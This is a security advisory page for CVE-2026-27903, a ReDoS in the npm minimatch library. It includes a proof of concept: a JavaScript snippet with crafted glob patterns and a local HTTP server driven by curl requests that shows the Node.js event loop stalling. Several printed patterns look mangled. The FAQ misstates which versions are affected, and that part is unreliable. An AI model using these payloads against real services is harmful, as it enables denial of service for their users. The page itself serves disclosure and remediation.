CVE-2026-27903: minimatch has a ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Published Feb 26, 2026
·
Updated

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

---

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

typescript while (fr < fl) { .. if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) { .. return true } .. fr++ }

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

| k (globstars) | Pattern size | Time | |---------------|--------------|----------| | 7 | 36 bytes | ~154ms | | 9 | 46 bytes | ~1.2s | | 11 | 56 bytes | ~5.4s | | 12 | 61 bytes | ~9.7s | | 13 | 66 bytes | ~15.9s |

---

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

javascript import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments // pattern: 46 bytes, default options const pattern = '/a//a//a//a//a//a//a//a//a/b' const path = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now() minimatch(path, pattern) console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

javascript // k=11 -> ~5.4s, k=13 -> ~15.9s const k = 11 const pattern = Array.from({ length: k }, () => '/a').join('/') + '/b' const path = Array(30).fill('a').join('/') minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

javascript // poc1-server.mjs import http from 'node:http' import { URL } from 'node:url' import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => { const url = new URL(req.url, http://localhost:${PORT}) if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

const pattern = url.searchParams.get('pattern') ?? '' const path = url.searchParams.get('path') ?? ''

const start = process.hrtime.bigint() const result = minimatch(path, pattern) const ms = Number(process.hrtime.bigint() - start) / 1e6

res.writeHead(200, { 'Content-Type': 'application/json' }) res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n') })

server.listen(PORT)

Terminal 1 -- start the server: node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell: curl "http://localhost:3000/match?pattern=%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2F%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request: curl -w "\ntimetotal: %{timetotal}s\n" "http://localhost:3000/match?pattern=%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3): {"result":true,"ms":"0"}

timetotal: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second timetotal is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

timetotal: 0.001599s

---

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

Other sources

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.

MITRE

Affected Software

25 affected componentsFixes available
npm/minimatch<10.2.3
npm/minimatch<9.0.7
npm/minimatch<8.0.6
npm/minimatch<7.4.8
npm/minimatch<6.2.2
npm/minimatch<5.1.8
npm/minimatch<4.2.5
npm/minimatch<3.1.3
npm/minimatch<3.1.3
3.1.3
npm/minimatch>=4.0.0<4.2.5
4.2.5
npm/minimatch>=5.0.0<5.1.8
5.1.8
npm/minimatch>=6.0.0<6.2.2
6.2.2
npm/minimatch>=7.0.0<7.4.8
7.4.8
npm/minimatch>=8.0.0<8.0.6
8.0.6
npm/minimatch>=9.0.0<9.0.7
9.0.7
npm/minimatch>=10.0.0<10.2.3
10.2.3
Minimatch Project Minimatch Node.js<3.1.3
Minimatch Project Minimatch Node.js>=4.0.0<4.2.5
Minimatch Project Minimatch Node.js>=5.0.0<5.1.8
Minimatch Project Minimatch Node.js>=6.0.0<6.2.2
Minimatch Project Minimatch Node.js>=7.0.0<7.4.8
Minimatch Project Minimatch Node.js>=8.0.0<8.0.6
Minimatch Project Minimatch Node.js>=9.0.0<9.0.7
Minimatch Project Minimatch Node.js>=10.0.0<10.2.3
IBM watsonx.data intelligence<=5.2.2, 5.3.0, 5.3.1, 5.3.1-patch-1

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 3.1.3
  2. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 4.2.5
  3. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 5.1.8
  4. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 6.2.2
  5. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 7.4.8
  6. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 8.0.6
  7. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 9.0.7
  8. Upgrade

    Upgrade npm/minimatch to a version that resolves this vulnerability.

    Fixed in 10.2.3
  9. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 10.2.3
  10. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 9.0.7
  11. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 8.0.6
  12. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 7.4.8
  13. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 6.2.2
  14. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 5.1.8
  15. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 4.2.5
  16. Upgrade

    Upgrade minimatch to a version that resolves this vulnerability.

    Fixed in 3.1.3
  17. Compensating control

    Do not pass attacker-influenced glob patterns to minimatch() (including patterns that contain multiple non-adjacent `**` GLOBSTAR segments); ensure glob pattern inputs are not user-controlled in endpoints such as build tools/task runners (ESLint/Webpack/Rollup config), multi-tenant rules, admin/developer interfaces that accept ignore/filter globs, or CI/CD evaluation of user-submitted config files.

Event History

Feb 26, 2026
CVE Published
via MITRE·01:06 AM
Data Sourced
via MITRE·01:06 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·02:16 AM
DescriptionSeverityWeaknessAffected Software
Advisory Published
via GitHub·10:10 PM
Data Sourced
via GitHub·10:10 PM
DescriptionSeverityWeaknessAffected Software
Jun 24, 2026
Data Sourced
via IBM·12:00 AM
DescriptionAffected Software

Parent advisories

This vulnerability appears in the following advisories.

Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-27903?

CVE-2026-27903 has not been assigned a severity score, but it involves a potential denial of service due to ReDoS concerns.

2

How do I fix CVE-2026-27903?

To mitigate CVE-2026-27903, update minimatch to version 3.1.3 or higher, or ensure the glob patterns do not contain multiple non-adjacent GLOBSTAR segments.

3

Which versions of minimatch are affected by CVE-2026-27903?

CVE-2026-27903 affects minimatch versions prior to 3.1.3, including versions 10.2.3 and below.

4

What type of attack does CVE-2026-27903 allow?

CVE-2026-27903 allows for a denial of service attack via unbounded recursive backtracking in the matchOne() function.

5

Is CVE-2026-27903 applicable to production environments?

Yes, CVE-2026-27903 can affect production environments if the vulnerable versions of minimatch are in use.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203